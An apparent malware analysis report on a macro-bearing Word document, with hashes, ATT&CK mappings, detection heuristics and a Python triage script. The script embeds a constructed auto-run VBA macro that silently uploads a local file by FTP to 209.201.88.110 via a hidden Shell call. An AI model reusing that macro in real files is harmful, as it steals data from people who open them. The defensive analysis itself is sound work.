Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09f55d41686220a0…

MALICIOUS

Office (OLE)

Size: 90.0 KB
Created: 2009-08-30 20:40:00
Authoring application: Microsoft Word 11.5.3
MD5: dffd21c000acb9a86d63314ddebb1a3a
SHA-1: b7a94d2776e0222f0d3ace456c6bdc0c458a1052
SHA-256: 09f55d41686220a0492a2b214c0a2094690831318623134920c969a1c0a593f2
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample contains VBA macros that invoke Shell() to launch an external command, the usual vehicle for downloading and running additional content. The macro writes a log file matching 'C:\hsf*.sys' and then uses FTP commands to upload it to 209.201.88.110, so the behaviour actually observed is exfiltration of a local file to a remote host. The embedded URLs are likely related to payload delivery or C2 communication, although a URL on its own is not a detection. The ClamAV detections on the document itself and on the carved macro source further support the malicious verdict.

Heuristics (6)

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.ca-hss.com
    • http://www.onlineintervention.com
    • http://www.stjoachimschool.org
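The summary and the heuristics above describe what the analysis engine looked for in the decoded macro source (a Shell() call, scripted FTP to 209.201.88.110, a log file under C:\hsf*.sys, embedded URLs, deadline language in the body). The script below is an added example that re-implements those checks in plain Python so the reasoning behind each label can be inspected; it is not the report's analysis engine and not oletools. The macro text and body text it runs on are constructed for illustration and are not the 6896-byte macros.bas carved from the sample: only the file path, the FTP host and the three URLs are taken from the report. The labels OLE_VBA_SHELL, OLE_VBA_MACROS, SE_URGENCY_LURE and EMBEDDED_URL are the report's own; VBA_FTP_SCRIPT and OLE_VBA_AUTOEXEC are assumed names introduced here.

```python
"""Re-implementation of the triage heuristics listed in the report.

Added example: not the report's analysis engine and not oletools. Run it as a
script to see the findings, or import triage() from another module.
"""
import hashlib
import re

# Constructed VBA source (assumption): mimics the behaviour the summary
# describes. It is NOT the macros.bas carved from sample 09f55d41...
SAMPLE_VBA = r'''
Const C2 = "http://www.ca-hss.com"
Const ALT = "http://www.onlineintervention.com"

Sub AutoOpen()
    Dim logFile As String
    logFile = "C:\hsf" & Format(Now, "hhmmss") & ".sys"
    Open "C:\ftpcmd.txt" For Output As #1
    Print #1, "open 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "put " & logFile
    Print #1, "bye"
    Close #1
    Shell "cmd.exe /c ftp -s:C:\ftpcmd.txt", vbHide
End Sub
'''

# Constructed document body text (assumption) carrying a deadline lure and a link.
SAMPLE_BODY = ("Your account will be terminated. Action required within 24 hours: "
               "confirm at http://www.stjoachimschool.org")

URL_RE = re.compile(r'https?://[\w.\-]+(?:/[^\s"\'<>)]*)?', re.IGNORECASE)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# Both 'Shell "cmd"' (statement) and 'Shell("cmd")' (function) are valid VBA.
SHELL_RE = re.compile(r'\bShell\s*(?:\(|")', re.IGNORECASE)
# ftp -s:<file> drives the Windows ftp client from a command script.
FTP_RE = re.compile(r'\bftp(?:\.exe)?\s+-s:', re.IGNORECASE)
AUTOEXEC_RE = re.compile(
    r'\b(?:AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\b', re.IGNORECASE)
URGENCY_PHRASES = ("account will be terminated", "action required within", "within 24 hours")


def extract_urls(text, channel):
    """Map each URL in text to the channel it was found in (macro, body, ...)."""
    return {url: channel for url in URL_RE.findall(text)}


def extract_ipv4(text):
    """Dotted quads whose octets are all in range; drops version-number lookalikes."""
    return sorted({ip for ip in IPV4_RE.findall(text)
                   if all(int(octet) <= 255 for octet in ip.split("."))})


def triage(vba_source, body_text=""):
    """Return the findings (label, severity, description), URLs with their
    channel, IPv4 literals and the SHA-256 of the decoded macro source."""
    findings = []
    if SHELL_RE.search(vba_source):
        findings.append(("OLE_VBA_SHELL", "critical", "Shell() call in VBA"))
    if FTP_RE.search(vba_source):  # assumed label, not one of the report's
        findings.append(("VBA_FTP_SCRIPT", "high", "scripted ftp -s: transfer launched from VBA"))
    if AUTOEXEC_RE.search(vba_source):  # assumed label, not one of the report's
        findings.append(("OLE_VBA_AUTOEXEC", "medium", "macro runs automatically on open"))
    if vba_source.strip():
        findings.append(("OLE_VBA_MACROS", "medium", "Document contains VBA macro code"))
    if any(phrase in body_text.lower() for phrase in URGENCY_PHRASES):
        findings.append(("SE_URGENCY_LURE", "low", "urgency or deadline language in body"))
    # Per-URL channel labels: a macro hit outranks a body hit for the same URL.
    urls = {**extract_urls(body_text, "document body"), **extract_urls(vba_source, "macro")}
    if urls:
        findings.append(("EMBEDDED_URL", "info", f"{len(urls)} URL(s) extracted"))
    return {
        "macro_sha256": hashlib.sha256(vba_source.encode()).hexdigest(),
        "findings": findings,
        "urls": urls,
        "ipv4": extract_ipv4(vba_source),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_VBA, SAMPLE_BODY)
    print("macro sha256:", result["macro_sha256"])
    for label, severity, description in result["findings"]:
        print(f"{severity:8s} {label:18s} {description}")
    for url, channel in result["urls"].items():
        print(f"url      {url} ({channel})")
    for ip in result["ipv4"]:
        print(f"ipv4     {ip}")
```

The channel label on each URL is what the EMBEDDED_URL heuristic asks for: a URL that only appears in the document body is a far weaker signal than one hard-coded in a macro string, and the hash of the decoded source is what lets a carved artifact such as macros.bas be matched against ClamAV or a threat-intel feed independently of the wrapping document.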

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: f9f57e870c2815c497a3874f94feb52dee3c2cb50e8653e0eef3a472f54e7488
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6896 bytes
Detection: ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely